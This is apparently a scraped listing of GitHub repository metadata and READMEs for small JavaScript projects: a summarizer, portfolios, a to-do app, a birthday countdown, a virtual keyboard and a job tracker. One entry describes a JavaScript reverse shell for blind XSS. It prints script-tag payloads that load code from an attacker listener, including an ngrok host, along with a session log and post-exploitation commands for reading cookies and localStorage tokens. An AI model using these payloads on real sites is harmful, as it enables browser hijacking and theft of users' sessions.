Modern OpenAI GPT-4 Article Summarizer
ai,article-extractor,artificial-intelligence,chatgpt,css,gpt-4,html,javascript,js,machine-learning
2023-05-13T05:57:49Z
2024-05-21T06:25:17Z
null
1
161
365
0
2
6
null
MIT
JavaScript
kaushiktarun05/oldportfolio
main
null
Old Portfolio website
css,html,javascript,scss
2023-04-25T18:11:03Z
2023-08-16T16:00:05Z
null
2
1
24
0
2
6
null
null
SCSS
shihabrafio/To-do-list
master
![](https://img.shields.io/badge/Microverse-blueviolet) <a name="readme-top"></a> <div align="center"> <b> <i> <u> PREVIEW </u> </i></b> </br> </br> <img src='./video.gif'> </div> <div align="center"> <h3><b>A To do List</b></h3> </div> # :green_book: Table of Contents - [:book: About the Project](#about-project) - [🛠 Built With](#built-with) - [Tech Stack](#tech-stack) - [Key Features](#key-features) - [:rocket: Live Demo](#live-demo) - [:computer: Getting Started](#getting-started) - [Prerequisites](#prerequisites) - [Setup](#setup) - [Install](#install) - [Usage](#usage) - [Run tests](#run-tests) - [Deployment](#deployment) - [:bust_in_silhouette: Author](#author) - [:telescope: Future Features](#future-features) - [:handshake: Contributing](#contributing) - [:star:️ Show your support](#support) - [:pray: Acknowledgements](#acknowledgements) - [:memo: License](#license) # :book: A To do List <a name="about-project"></a> **A To do List** is a website that allows users to create and manage their to-do lists online. These websites usually offer features such as the ability to create multiple lists, set due dates and reminders for tasks, prioritize tasks, and mark tasks as completed. ## 🛠 Built With <a name="built-with"></a> ### Tech Stack <a name="tech-stack"></a> <details> <summary>Client</summary> <ul> <li><a href="https://webpack.js.org/">WEBPACK</a></li> </ul> </details> ### Key Features <a name="key-features"></a> - **Webpack** - **Dynamics of HTML** <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LIVE DEMO --> ## 🚀 Live Demo <a name="live-demo"></a> - [Live Demo Link]( https://shihabrafio.github.io/To-do-list/) <p align="right">(<a href="#readme-top">back to top</a>)</p> ## :computer: Getting Started <a name="getting-started"></a> To get a local copy up and running, follow these steps. ### Prerequisites In order to run this project you need: - A web browser to view output e.g [Google Chrome](https://www.google.com/chrome/). - An IDE e.g [Visual studio code](https://code.visualstudio.com/). - [A terminal](https://code.visualstudio.com/docs/terminal/basics). ### Setup Clone this repository to your desired folder or download the Zip folder: ```sh "git clone https://github.com/shihabrafio/To-do-list.git" ``` - Navigate to the location of the folder in your machine: ```sh cd ./user/ ``` ### Install Install all dependencies: ```sh "npm install" ``` ### Usage To run the project, follow these instructions: - After Cloning this repo to your local machine. - To get it running on your default browser and local host, run: ```sh " Open the index.html in the project directory with your preferred browser to run the project" ``` ### Run tests To run tests, run the following command: - HTML linter errors run: ``` npx hint . ``` - CSS linter errors run: ``` npx stylelint "**/*.{css,scss}" ``` - JavaScript linter errors run: ``` npx eslint . ``` - For unit testing, run: ``` npm test ``` ### Deployment <a name="deployment"></a> You can deploy this project using: GitHub Pages, - I used GitHub Pages to deploy my website. - For more information about publishing sources, see "[About GitHub pages](https://docs.github.com/en/pages/getting-started-with-github-pages/about-github-pages#publishing-sources-for-github-pages-sites)". <p align="right">(<a href="#readme-top">back to top</a>)</p> ## :bust_in_silhouette: Author <a name="author"></a> 👤 *A.I.M. Shihab Uddin Khan* - GitHub: [@shihabrafio](https://github.com/shihabrafio) - Twitter: [@shihab_uddin19](https://twitter.com/shihab_uddin19) - LinkedIn: [Shihab Uddin Khan](https://www.linkedin.com/in/shihab-uddin-khan-45620a16a/) <p align="right">(<a href="#readme-top">back to top</a>)</p> ## :telescope: Future Features <a name="future-features"></a> - **Headers and footers** - **Setup Navigations > Book lists, Add books & Contact information** - **Implement unit testing** <p align="right">(<a href="#readme-top">back to top</a>)</p> ## :handshake: Contributing <a name="contributing"></a> Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](../../issues/). <p align="right">(<a href="#readme-top">back to top</a>)</p> ## :star:️ Show your support <a name="support"></a> Give a :star:️ if you like this project and how I managed to build it! <p align="right">(<a href="#readme-top">back to top</a>)</p> ## :pray: Acknowledgments <a name="acknowledgements"></a> - Creative Commons license of the design - I would like to thanks all my coding partners at Microverse <p align="right">(<a href="#readme-top">back to top</a>)</p> ## :memo: License <a name="license"></a> This project is [MIT](LICENSE) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
A to-do list website is a useful tool for keeping track of tasks and staying organized. It allows users to create, manage and prioritize tasks, set reminders and deadlines, and track their progress towards completing their goals.
javascript
2023-05-01T11:04:03Z
2023-05-06T18:20:40Z
null
1
5
18
0
1
6
null
MIT
JavaScript
dimondevceo/reverse_shell_javascript
main
# Description A reverse shell in JavaScript using HTTP to communicate, used to confirm blind XSS vulnerabilities and a tool for browser post-exploitation. # Setup and Use ``pip install pyngrok socketserver`` Then, run in terminal or cmd: ``python server.py`` Now, run the JavaScript XSS payload on the target (Or simply open the HTML payload in the browser). ```` ____ _ ____ _ ____ | _ \(_)_ __ ___ ___ _ __ | _ \ | / ___| | | | | | '_ ` _ \ / _ \| '_ \| | | |_ | \___ \ | |_| | | | | | | | (_) | | | | |_| | |_| |___) | |____/|_|_| |_| |_|\___/|_| |_|____/ \___/|____/ v1.3 <------------ Developed by DimonDev ------------> [!] Execute one of these payloads on the target: Local target: <script src="http://localhost:6969/?command=get_script"></script> The HTML payload: http://localhost:6969/ Remote target: <script src="https://aaaabbbbcccc.ngrok-free.app/?command=get_script"></script> The HTML payload: https://aaaabbbbcccc.ngrok-free.app [+] Listener server started over WAN - https://aaaabbbbcccc.ngrok-free.app [+] Listening on port 6969 ```` When a the target is connected, it will spawn a reverse HTTP shell (type command help): ```` ____ _ ____ _ ____ | _ \(_)_ __ ___ ___ _ __ | _ \ | / ___| | | | | | '_ ` _ \ / _ \| '_ \| | | |_ | \___ \ | |_| | | | | | | | (_) | | | | |_| | |_| |___) | |____/|_|_| |_| |_|\___/|_| |_|____/ \___/|____/ v1.3 <------------ Developed by DimonDev ------------> [!] Execute one of these payloads on the target: Local target: <script src="http://localhost:6969/?command=get_script"></script> The HTML payload: http://localhost:6969/ Remote target: <script src="https://aaaabbbbcccc.ngrok-free.app/?command=get_script"></script> The HTML payload: https://aaaabbbbcccc.ngrok-free.app [+] Listener server started over WAN - https://aaaabbbbcccc.ngrok-free.app [+] Listening on port 6969 127.0.0.1 - - [03/May/2023 23:47:55] "GET /?command=get_script HTTP/1.1" 200 - 127.0.0.1~# 127.0.0.1 - - [03/May/2023 23:47:55] "GET /shell HTTP/1.1" 200 - 127.0.0.1 - - [03/May/2023 23:47:56] code 404, message Not Found 127.0.0.1 - - [03/May/2023 23:47:56] "GET /favicon.ico HTTP/1.1" 404 - undefined 127.0.0.1~# 127.0.0.1 - - [03/May/2023 23:47:56] "GET /shell?resp=undefined HTTP/1.1" 200 - 127.0.0.1~# 127.0.0.1 - - [03/May/2023 23:47:56] "GET /shell HTTP/1.1" 200 - undefined 127.0.0.1~# 127.0.0.1 - - [03/May/2023 23:47:57] "GET /shell?resp=undefined HTTP/1.1" 200 - 127.0.0.1~# 127.0.0.1 - - [03/May/2023 23:47:58] "GET /shell HTTP/1.1" 200 - undefined 127.0.0.1~# help --------------------------------------------------------- Usage: You can either input a Javascript snippet or use the internal commands. Commands: help - Prints this message. getip - Fetches the public IP of the target. vulnscan - Scans for possible CVEs in the target browser. info CVE-0000-0000 - Information about a CVE. exploit CVE-0000-0000 - (For now, it only prints exploit-db url) Useful JavaScript: document.documentURI document.location document.domain document.body.innerHTML document.head.innerHTML document.cookie localStorage localStorage.getItem("SOME_ITEM_OR_TOKEN") navigator.userAgent navigator.platform navigator.vibrate() navigator.javaEnabled() navigator.languages navigator.maxTouchPoints navigator.buildID ----------------- Developed by DimonDev ----------------- 127.0.0.1~# ```` # Post-exploitation You can now use the JavaScript console remotely. Here are some interesting commands to use: 1. `document.documentURI`: This property returns the URI (Uniform Resource Identifier) of the current document. 2. `document.location`: This property returns a Location object, which contains information about the current URL of the document, including the protocol, host, port, pathname, and search parameters. 3. `document.domain`: This property returns the domain of the current document's URL. This property is often used to enable cross-origin scripting between documents served from different domains. 4. `document.body.innerHTML`: This property allows you to get or set the HTML content of the `<body>` element of the current document. When you set this property, the existing content of the `<body>` element is replaced with the new content. 5. `document.head.innerHTML`: This property allows you to get or set the HTML content of the `<head>` element of the current document. When you set this property, the existing content of the `<head>` element is replaced with the new content. 6. `document.cookie`: This property allows you to get or set the cookies associated with the current document. Cookies are small pieces of data that are stored on the client-side and are often used to persist user preferences or authentication information. 7. `localStorage`: This is an object that provides a simple key-value store for persisting data on the client-side. Unlike cookies, data stored in localStorage is not sent to the server with every request. 8. `localStorage.getItem("SOME_ITEM_OR_TOKEN")`: This method allows you to retrieve an item from localStorage based on its key. The key is a string that you provide when you store the item. 9. `navigator.platform`: This property returns a string that identifies the operating system platform that the browser is running on (e.g., "MacIntel", "Win32", "Linux x86_64", etc.). 10. `navigator.vibrate()`: This method allows you to trigger a vibration effect on the user's device. This method takes an array of integers that specifies the pattern of vibration (e.g., `[100, 200, 300]` would vibrate for 100ms, then pause for 200ms, then vibrate for 300ms). 11. `navigator.javaEnabled()`: This method returns a boolean indicating whether the browser has Java support enabled. 12. `navigator.languages`: This property returns an array of strings that represents the user's preferred languages for content. 13. `navigator.maxTouchPoints`: This property returns the maximum number of simultaneous touch points that the user's device supports. 14. `navigator.buildID`: This property returns a string that identifies the build of the browser that the user is using. This value is often used for debugging purposes. Remember to get creative!
A reverse shell in JavaScript using HTTP, used to confirm blind XSS vulnerabilities and a tool for browser post-exploitation
blind-xss,post-exploitation,reverse-shell,xss,javascript
2023-04-30T20:05:04Z
2023-05-04T12:45:25Z
null
1
0
11
0
6
6
null
null
Python
X1-Il/Birth-chrono
main
# 🎉Birthday Wisher with Countdown!🎉 Made with React with Hooks. ## Getting started You can view a live demo over at https://birthday-chrono.netlify.app/ To get It running locally: - Clone this repo - `npm install` to install all req'd dependencies - `npm start` to start the local server (this project uses create-react-app) ## Usage: Visit [https://birthday-chrono.netlify.app/]() Click on Generate Link or Head to [https://birthday-chrono.netlify.app/generate]() Enter the `name , day , month of birthday` ![ScreenShot of Form](screenshots/generate.png) Click on Generate Link You Can see a Link being generated Copy or Visit the link by Clicking on the Button And There You Go ! 🎉 ![ScreenShot of Form](screenshots/duma.png) ## ScreenShot of Coutdown Timer⏲️ ![ScreenShot of Countdown](screenshots/countdown.png) ## Birthday Wisher🎂 Loads this Page Instead of Coutdown on the Birthday ![ScreenShot of Countdown](screenshots/wishPage.png) It's Fully Responsive and you change styles in the `app.css` Wishing Component Page : `Wish.jsx` Countdown Compenent Page : `Countdown.jsx`
simple app show a countdown for a birthday date
birthday,countdown,countdown-javascript,countdown-timer,javascript
2023-05-06T17:38:17Z
2023-05-06T17:47:36Z
null
1
0
4
0
3
6
null
MIT
JavaScript
GreyWyvern/virtual-keyboard
main
# Javascript Virtual Keyboard Add a javascript virtual keyboard to text, password, textarea, and number inputs. Good for kiosk use, or to allow convenient input of characters from different languages. ![example01](https://github.com/GreyWyvern/virtual-keyboard/assets/137631/9f877409-f29b-43d5-8605-a39210cee802) Includes a "User Script" version that can be added to browsers such as Firefox to enable the keyboard on all pages. See the project page at [greywyvern.com](https://greywyvern.com/code/javascript/keyboard/) for examples and instructions. SVG icon modified from [Icon Fonts](https://www.onlinewebfonts.com/icon); licenced by CC BY 3.0. ## Keyboard Credits - Yiddish (Yidish Lebt) keyboard layout by **Simche Taub** ([jidysz.net](https://jidysz.net)) - Urdu Phonetic keyboard layout by **Khalid Malik** - Yiddish keyboard layout by **Helmut Wollmersdorfer** - Khmer keyboard layout by **Sovann Heng** ([km-kh.com](https://km-kh.com)) - Dari keyboard layout by **Saif Fazel** - Kurdish keyboard layout by **Ara Qadir** - Assamese keyboard layout by **Kanchan Gogoi** - Bulgarian BDS keyboard layout by **Milen Georgiev** - Basic Japanese Hiragana/Katakana keyboard layout by **Damjan** - Ukrainian keyboard layout by **Dmitry Nikitin** - Macedonian keyboard layout by **Damjan Dimitrioski** - Pashto keyboard layout by **Ahmad Wali Achakzai** ([qamosona.com](https://qamosona.com)) - Armenian Eastern and Western keyboard layouts by **Hayastan Project** ([www.hayastan.co.uk](https://www.hayastan.co.uk)) - Pinyin keyboard layout from a collaboration with **Lou Winklemann** - Kazakh keyboard layout by **Alex Madyankin** - Danish keyboard layout by **Verner Kjærsgaard** - Slovak keyboard layout by **Daniel Lara** ([www.learningslovak.com](https://www.learningslovak.com)) - Belarusian and Serbian Cyrillic keyboard layouts by **Evgeniy Titov** - Bulgarian Phonetic keyboard layout by **Samuil Gospodinov** - Swedish keyboard layout by **Håkan Sandberg** - Romanian keyboard layout by **Aurel** - Farsi (Persian) keyboard layout by **Kaveh Bakhtiyari** ([www.bakhtiyari.com](https://www.bakhtiyari.com)) - Burmese keyboard layout by **Cetanapa** - Bosnian/Croatian/Serbian Latin/Slovenian keyboard layout by **Miran Zeljko** - Hungarian keyboard layout by **Antal Sall 'Hiromacu'** - Arabic keyboard layout by **Srinivas Reddy** - Italian and Spanish (Spain) keyboard layouts by **[dictionarist.com](https://dictionarist.com)** - Lithuanian and Russian keyboard layouts by **Ramunas** - German keyboard layout by **QuHno** - French keyboard layout by **Hidden Evil** - Polish Programmers layout by **moose** - Turkish keyboard layouts by **offcu** - Dutch and US Int'l keyboard layouts by **jerone**
Add a javascript virtual keyboard to text, password, textarea, and number inputs. Good for kiosk use, or to allow convenient input of characters from different languages.
javascript,kiosk-software,virtual-keyboard,keyboard
2023-05-09T13:35:56Z
2024-05-10T17:08:53Z
null
1
1
13
1
3
6
null
MIT
CSS
zxcodes/SocialApp
main
# SocialApp # App Screenshots <img src="https://github.com/zxcodes/SocialApp/assets/44538497/ca0be1f5-a94d-45c0-ab71-c5eca7b6cbee" height="500" alt="Home Screen"/> <img src="https://github.com/zxcodes/SocialApp/assets/44538497/8b84c072-80f8-42cb-b0c2-d0ec8de0aa38" height="500" alt="Profile Screen" /> # Technical Details - This app has been bootstrapped with Expo TypeScript (https://expo.dev) # Run this app (development): - Clone the repo HTTPS: ``` git clone https://github.com/zxcodes/SocialApp.git ``` - Clone Over SSH: ``` git clone git@github.com:zxcodes/SocialApp.git ``` ## Install dependencies ``` cd SocialApp && yarn install ``` ## Run on Android Emulator (if setup) ``` yarn run android ``` ## Run on iOS Simulator (if setup) ``` yarn run ios ``` ## Running on a physical device: - Start the development server after installing dependencies via `yarn install` ``` yarn start ``` - Download the Expo Go App and scan the QR Code from the terminal. On iOS, scan the QR Code from the inbuilt scanner or the native Camera App. - Expo Go Android App: https://play.google.com/store/apps/details?id=host.exp.exponent - Expo Go iOS App: https://apps.apple.com/us/app/expo-go/id982107779
A beautiful Social Media App built with React Native, Expo, & TypeScript.
expo,javascript,react,react-native,typescript
2023-05-10T08:52:54Z
2023-09-03T00:37:26Z
null
1
0
6
0
0
6
null
null
TypeScript
christianbmartinez/cbm_2023
main
[![Netlify Status](https://api.netlify.com/api/v1/badges/62742c89-b09c-46eb-b609-8ad307b7bad0/deploy-status)](https://app.netlify.com/sites/melodic-mandazi-febcac/deploys) ![alt text](https://github.com/christianbmartinez/cbm_2023/blob/main/public/img/md-image.jpg) # What's this? Portfolio website for Christian B. Martinez 2023 # Built with - React - Axios - Next JS - Next themes - Tailwind CSS - Framer motion - Open AI API - MongoDB - Giphy API - TS Particles - Github API - EmailJS - Next MDX Remote - Redis # What's Inside? - A web developer portfolio using modern technologies. - A rate limited chat gpt widget that answers questions about me. - A full stack guestbook page with gif and formatting support. - Programatically fetch latest repos. - A blog that uses markdown. - Particles landing page. - Fully responsive design. - Light and dark mode. - Animated web pages and transitions.
My 2023 website
javascript,nextjs,openai,tailwindcss,emailjs,framer-motion,giphy-api,github-api,mongodb,rate-limiting
2023-04-28T13:17:20Z
2023-12-27T22:55:42Z
null
1
31
254
0
1
6
null
GPL-2.0
JavaScript
No-Country/S8-12-T-Java-React
develop
<div align="right"> [![GPLv3 License](https://img.shields.io/badge/License-GPL%20v3-yellow.svg)](https://opensource.org/licenses/) [![Version](https://badge.fury.io/gh/tterb%2FHyde.svg)](https://badge.fury.io/gh/tterb%2FHyde) [![GitHub pull requests](https://img.shields.io/github/issues-pr/cdnjs/cdnjs.svg?style=flat)]() [![PR's Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat)](http://makeapullrequest.com) [![GitHub contributors](https://img.shields.io/github/contributors/cdnjs/cdnjs.svg?style=flat)]() </div> <div align="center"> <br> <img align="center" src="https://i.ibb.co/X4K9ScM/banner.png"> <br> <h2>An app for job seekers who want to nail it. Get your resumes, job applications, and schedule organized with Carreer Watch.</h2> <br> ### Introducing Career Watch - your ultimate job search companion. With this game-changing project, you can take your job hunt to the next level and ensure you're on the right track. <br> </div> <p> Career Watch empowers you to create impressive resumes, organize your job applications into stages, and take charge of your schedule. But it doesn't stop there. You have the freedom to add specific tasks to each application, such as sending emails to HR or studying key topics for interviews. Stay on top of your game with handy reminders that keep you focused and motivated. <br><br> But here's the real game-changer: Career Watch lets you measure your progress with powerful metrics. For instance, imagine you've submitted 50 applications, received interview calls from 5 companies, and made it to technical tests with 2 of them. These metrics provide valuable insights, helping you reassess and fine-tune your job search strategy based on real results. <br><br> Say goodbye to guesswork and hello to a data-driven approach to your job search. Career Watch revolutionizes the way you navigate the job market, helping you make informed decisions that bring you closer to your dream career. Get ready to unleash your potential and land that perfect job with Career Watch. </p <br> </div> <div align="center"> <br> <img style="width:700px;" src="https://i.ibb.co/CwXvnDP/2.png"> <img style="width:700px;" src="https://i.ibb.co/CMq9ZsJ/1347-743.png"> <br><br> <img style="width:350px; height:660px;" src="https://i.ibb.co/gW78QqQ/325-662.png"> <img style="width:350px; height:660px;" src="https://i.ibb.co/pWR2Vm4/z.png"> <h3 align="center"><b>You can check out our webpage here:</b></h3> <h3 align="center"><a href="https://career-watch.web.app/" target="_blank" rel="noopener noreferrer"> :bar_chart: Career Watch :memo: </a></h3> <p align="center"><a href="https://www.youtube.com/watch?v=OP5fkhOOrNs&ab_channel=GerardoVargas" target="_blank" rel="noopener noreferrer"> <img src="https://img.shields.io/badge/Video Preview%20-%23FF0000.svg?&style=for-the-badge&logo=YouTube&logoColor=white"/></a></p> </div> <br><br> ## ✔ BackEnd #### 👉🏻 Task List ✅ - Development of REST API with Java and Spring-Boot. - Create Postgre Database on AWS RDS and configure in a Proxy RDS. - Deploy API in API Gateway, with lambda proxy integration. - Build specific lambda for register and autentication. - Authorization procces through API gateway and lambda custom authorizer. - Users validation with JWT built and signed in the application, or Oauth2.0 from Google. - Creating filters with regular expressions and JPA/Hibernate rules. - API documentation on Swagger3. - Endpoints and services fully tested. - Containerization in docker to run locally. #### 👉🏻 Code Standards 📜 - Keep in mind rules from [Google Java Style Guide](https://google.github.io/styleguide/javaguide.html). - Code must be in English. - The controllers should finish with suffix "Controller". Example: UserController. - The services should finish with suffix "Service". Example: UserService. - The repositories should finish with suffix "Repository". Example: UserRepository. - The implementations of interfaces should finish with suffix "Impl". Example: UserServiceImpl. - The DTOs should finish with suffix "Dto". Example: UserDto, UserRequestDto. - Usage of DTOs is a must. Can have DTOs for request and response. - Package names are in singular. - The names of attributes/fields from Java classes must be written using camel case. Example: firstName. - The name of columns in the entities must be written using underscore and uppercase. Example: FIRST_NAME. The name of the tables is always in plural, but the entity name should be in singular. - Exceptions should be handled by an implementation of ControllerAdvice. - Messages to user can't be hardcoded them should be handled. Some refs [here](https://looksok.wordpress.com/2014/07/05/string-externalization-in-spring-3-1-with-messagesource-no-web-xml/) and [here](https://zetcode.com/spring/messagesource/). - If you add a new endpoint, make sure to set the role access for it in the WebSecurity class. #### 👉🏻 Documentation 📜 - You can read API docs <a href="http://cwapidocs.s3-website-us-east-1.amazonaws.com/" target="_blank">here</a>. #### 👉🏻 Serverless Architecture ☁️ - The application is modularized into three lambda functions, by means of cloud formation using SAM. <br> - The <b>first lambda</b> executes the registration and authentication of new users and returns a JWT.<br> - The <b>second lambda</b> is in charge of authorization , which verifies the existence of the token in the "Authorization" header and its validity, which can be generated by the registration lambda or come from a third party provider such as Google through Oauth2.0, and generates an IAM policy to allow the execution of the third lambda.<br> - The <b>third lambda</b> works under proxy protocol, and is where the application endpoints that call the business logic are located, which in turn communicates with a Postgre database in RDS through a RDS proxy.<br> - The three lambdas generate the logs in CloudWatch and their environment variables are managed by the AWS secrets manager.<br> <br> <img src="https://docs.aws.amazon.com/images/apigateway/latest/developerguide/images/custom-auth-workflow.png"> #### 👉🏻 Built with 🛠️ ![IntelliJ IDEA](https://img.shields.io/badge/IntelliJIDEA-000000.svg?style=for-the-badge&logo=intellij-idea&logoColor=white) ![Java](https://img.shields.io/badge/java-%23ED8B00.svg?style=for-the-badge&logo=java&logoColor=white) ![Spring](https://img.shields.io/badge/spring-%236DB33F.svg?style=for-the-badge&logo=spring&logoColor=white) ![Postgres](https://img.shields.io/badge/postgres-%23316192.svg?style=for-the-badge&logo=postgresql&logoColor=white) ![Hibernate](https://img.shields.io/badge/Hibernate-59666C?style=for-the-badge&logo=Hibernate&logoColor=white) ![JWT](https://img.shields.io/badge/JWT-black?style=for-the-badge&logo=JSON%20web%20tokens) ![Swagger](https://img.shields.io/badge/-Swagger-%23Clojure?style=for-the-badge&logo=swagger&logoColor=white) ![Docker](https://img.shields.io/badge/docker-%230db7ed.svg?style=for-the-badge&logo=docker&logoColor=white) ![AWS](https://img.shields.io/badge/AWS-%23FF9900.svg?style=for-the-badge&logo=amazon-aws&logoColor=white) #### 👉🏻 Developers 👨🏻‍💻 | <img src="https://avatars.githubusercontent.com/u/83373185?s=400&u=8a6f208010656f54fe828ab92cfebbe430e9f019&v=4" width=100>| <img src="https://avatars.githubusercontent.com/u/93452642?v=4" width=100>| |:-:|:-:| | **Emiliano Escobedo**| **Brayan Rodallega**| | <a href="https://github.com/EmilianoEscobedo"><img src="https://img.shields.io/badge/github-%23121011.svg?&style=for-the-badge&logo=github&logoColor=white"/></a> <a href="https://www.linkedin.com/in/emiliano-escobedo/"><img src="https://img.shields.io/badge/linkedin%20-%230077B5.svg?&style=for-the-badge&logo=linkedin&logoColor=white"/></a> | <a href="https://github.com/brayanrodallega"><img src="https://img.shields.io/badge/github-%23121011.svg?&style=for-the-badge&logo=github&logoColor=white"/></a> <a href="https://www.linkedin.com/in/brayanrodallega/"><img src="https://img.shields.io/badge/linkedin%20-%230077B5.svg?&style=for-the-badge&logo=linkedin&logoColor=white"/></a> <br><br> ## ✔ FrontEnd #### 👉🏻 Task List ✅ - Development of front-end reactive React app. - Implementation of UX/UI designs. - Implementation of security architecture with JWT interceptors. - Connection with REST API. - Deployed in Firebase hosting. #### 👉🏻 Code Standards 📜 - Name React components using PascalCase. For example: UserCard, LoginForm. - Use meaningful and descriptive names for variables, functions, and components. - Separate concerns and maintain a modular structure for your code. Each component should have its own file. - Organize components into logical folders based on their functionality or feature. - Use camelCase for variable and function names. For example: firstName, getUserData(). - Utilize reusable components whenever possible to avoid code duplication. - Follow the recommended file structure for React projects, separating components, styles, and other resources into their respective directories. - Utilize React hooks and functional components for new development whenever possible. - Ensure responsive design and cross-browser compatibility for a consistent user experience. - Optimize performance by following best practices such as lazy loading, code splitting, and efficient rendering techniques. - Prioritize code readability and maintain a consistent coding style throughout the project. - Handle errors and exceptions gracefully, providing helpful error messages to users when necessary. - Use localization techniques for handling strings and messages that need to be translated or externalized. #### 👉🏻 Built with 🛠️ ![Visual Studio Code](https://img.shields.io/badge/Visual%20Studio%20Code-0078d7.svg?style=for-the-badge&logo=visual-studio-code&logoColor=white) ![JavaScript](https://img.shields.io/badge/javascript-%23323330.svg?style=for-the-badge&logo=javascript&logoColor=%23F7DF1E) ![Vite](https://img.shields.io/badge/vite-%23646CFF.svg?style=for-the-badge&logo=vite&logoColor=white) ![React](https://img.shields.io/badge/react-%23202⭐⭐⭐2a.svg?style=for-the-badge&logo=react&logoColor=%2361DAFB) ![TailwindCSS](https://img.shields.io/badge/tailwindcss-%2338B2AC.svg?style=for-the-badge&logo=tailwind-css&logoColor=white) ![Firebase](https://img.shields.io/badge/firebase-%23039BE5.svg?style=for-the-badge&logo=firebase) #### 👉🏻 Developers 👨🏻‍💻 | <img src="https://avatars.githubusercontent.com/u/84945745?v=4" width=100>| <img src="https://avatars.githubusercontent.com/u/60641358?v=4" width=100>| <img src="https://avatars.githubusercontent.com/u/62000049?v=4" width=100>| |:-:|:-:|:-:| | **Nicolas Roberto**| **Facundo Ramirez**|**Agustin Soleti**| | <a href="https://github.com/nicolasroberto"><img src="https://img.shields.io/badge/github-%23121011.svg?&style=for-the-badge&logo=github&logoColor=white"/></a> <a href="https://www.linkedin.com/in/nicol%C3%A1s-roberto/"><img src="https://img.shields.io/badge/linkedin%20-%230077B5.svg?&style=for-the-badge&logo=linkedin&logoColor=white"/></a> | <a href="https://github.com/Jiao-lin"><img src="https://img.shields.io/badge/github-%23121011.svg?&style=for-the-badge&logo=github&logoColor=white"/></a> <a href="https://www.linkedin.com/in/facundo-ramirez-cambareri-4a426b1a5/"><img src="https://img.shields.io/badge/linkedin%20-%230077B5.svg?&style=for-the-badge&logo=linkedin&logoColor=white"/></a> | <a href="https://github.com/aguusoleti"><img src="https://img.shields.io/badge/github-%23121011.svg?&style=for-the-badge&logo=github&logoColor=white"/></a> <a href="https://www.linkedin.com/in/aguusoleti/"><img src="https://img.shields.io/badge/linkedin%20-%230077B5.svg?&style=for-the-badge&logo=linkedin&logoColor=white"/></a> | <br> ## ✔ Testing #### 👉🏻 Task List ✅ - Perform design and integration testing - Testing REST API endpoints - Testing front end components and back end integration #### 👉🏻 Documentation 📜 - You can read testing docs <a href="https://daleman.notion.site/Test-Template-18af0cb0011a4dd4afdb8a729824f315?pvs=4" target="_blank">here</a>. #### 👉🏻 Tested with 🛠️ ![Postman](https://img.shields.io/badge/Postman-FF6C37?style=for-the-badge&logo=postman&logoColor=white) ![Selenium](https://img.shields.io/badge/-selenium-%43B02A?style=for-the-badge&logo=selenium&logoColor=white) #### 👉🏻 Testers 👨🏻‍💻 | <img src="https://avatars.githubusercontent.com/u/85188798?v=4" width=100>| |:-:| | **Dolores Alemán**| | <a href="https://github.com/dolores91"><img src="https://img.shields.io/badge/github-%23121011.svg?&style=for-the-badge&logo=github&logoColor=white"/></a> <a href="https://www.linkedin.com/in/dolores-aleman/"><img src="https://img.shields.io/badge/linkedin%20-%230077B5.svg?&style=for-the-badge&logo=linkedin&logoColor=white"/></a> | <br> ## ✔ UX/UI Design #### 👉🏻 Task List ✅ - Design brand identity and logos - Design low quality prototypes and mockups - Define colors, fonts and styles - Move to medium quality and develop components - Copy-writing #### 👉🏻 Built with 🛠️ ![Figma](https://img.shields.io/badge/figma-%23F24E1E.svg?style=for-the-badge&logo=figma&logoColor=white) ![Adobe Illustrator](https://img.shields.io/badge/adobe%20illustrator-%23FF9A00.svg?style=for-the-badge&logo=adobe%20illustrator&logoColor=white) ![Adobe Photoshop](https://img.shields.io/badge/adobe%20photoshop-%2331A8FF.svg?style=for-the-badge&logo=adobe%20photoshop&logoColor=white) ![Canva](https://img.shields.io/badge/Canva-%2300C4CC.svg?style=for-the-badge&logo=Canva&logoColor=white) #### 👉🏻 Designers 👨🏻‍💻 | <img src="https://ca.slack-edge.com/T032Y55Q6VC-U04F9DLU37U-365a35d22506-512" width=100>| |:-:| | **Gerardo Vargas**| | <a href="https://www.behance.net/geravargas"><img src="https://img.shields.io/badge/Behance-1769ff?style=for-the-badge&logo=behance&logoColor=white"/></a> <a href="https://www.linkedin.com/in/geravargas/"><img src="https://img.shields.io/badge/linkedin%20-%230077B5.svg?&style=for-the-badge&logo=linkedin&logoColor=white"/></a> | <br> ## ✔ WorkFlow #### 👉🏻 Commits Format 📜 - Always create the branch from develop - The branch name format is: `feature/{jiraTicket#}`. - The pull request title format is: `{jiraTicket#}: {jiraTitle}`. - The commits format is: `{jiraTicket#}: {commitDescription}`, Small commits are a nice to have. - The pull request has to contain only the changes related to the scope defined in the ticket. - Pull request should always be from your current branch to develop. #### 👉🏻 Branches Format 📜 In the current repository you will see three diferent branches - `main` -> this branch is only for productive versions, it has official release history. - `develop` -> this branch serves as an integration branch for features. All features must start from this branch and after it's finished it gets merged back into develop. For understanding more about git and how to work with different branches, I recommend to read about Gitflow workflow. [Here](https://www.atlassian.com/git/tutorials/comparing-workflows/gitflow-workflow) you have a little explanation that can serve as introduction. #### 👉🏻 Scrum 🤝 - Sprints last one week. - Two mandatory meetings with team leader per sprint. - The maximum duration of the daily meeting is 15 min. - Tasks without an epic are not allowed. - Epics have to be backed by user stories. - Tasks have to be assigned according to estimate. #### 👉🏻 Used software 🛠️ ![Jira](https://img.shields.io/badge/jira-%230A0FFF.svg?style=for-the-badge&logo=jira&logoColor=white) ![Git](https://img.shields.io/badge/git-%23F05033.svg?style=for-the-badge&logo=git&logoColor=white) ![GitHub](https://img.shields.io/badge/github-%23121011.svg?style=for-the-badge&logo=github&logoColor=white) #### 👉🏻 Team Leader 👨🏻‍💻 | <img src="https://avatars.githubusercontent.com/u/75045716?v=4" width=100>| |:-:| | **Billy Campagnoli**| | <a href="https://github.com/Bfix40"><img src="https://img.shields.io/badge/github-%23121011.svg?&style=for-the-badge&logo=github&logoColor=white"/></a> <a href="https://www.linkedin.com/in/billy-campagnoli-221621223/"><img src="https://img.shields.io/badge/linkedin%20-%230077B5.svg?&style=for-the-badge&logo=linkedin&logoColor=white"/></a> | <br> <hr> <br><br>
Web-app to manage and track your job search
aws,java,javascript,lambda,react,spring-boot,serverless,tailwind-css
2023-05-12T20:12:38Z
2023-06-09T21:54:01Z
null
10
97
332
0
6
6
null
null
Java
TheCodeDaniel/space-web-template
main
